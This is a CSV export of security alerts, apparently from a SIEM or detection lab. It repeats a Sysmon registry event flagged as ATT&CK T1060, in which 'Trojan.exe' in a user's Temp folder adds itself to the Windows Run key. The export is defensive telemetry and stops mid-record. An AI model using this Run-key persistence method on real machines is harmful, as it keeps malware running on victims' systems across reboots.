HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:19.742236900Z"",""eventRecordID"":""1824"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:19.731\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:19.731"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:22.423",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:18.684 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:18.687564800Z"",""eventRecordID"":""1822"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:18.684\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:18.684"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:21.235",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:17.668 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:17.672119700Z"",""eventRecordID"":""1821"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:17.668\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:17.668"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:20.954",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:16.652 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:16.656929800Z"",""eventRecordID"":""1820"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:16.652\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:16.652"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:19.875",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:15.639 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:15.645416000Z"",""eventRecordID"":""1819"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:15.639\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:15.639"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:18.938",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:14.605 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:14.608378200Z"",""eventRecordID"":""1818"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:14.605\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:14.605"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:17.868",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:13.574 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:13.578743400Z"",""eventRecordID"":""1817"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:13.574\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:13.574"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:16.782",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:12.559 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:12.560945500Z"",""eventRecordID"":""1816"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:12.559\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:12.559"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:15.672",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:11.543 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:11.548316700Z"",""eventRecordID"":""1815"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:11.543\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:11.543"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:14.501",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:10.527 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:10.540277700Z"",""eventRecordID"":""1814"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:10.527\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:10.527"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:13.411",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:09.500 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:09.503399400Z"",""eventRecordID"":""1813"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:09.500\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:09.500"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:12.285",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:08.465 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 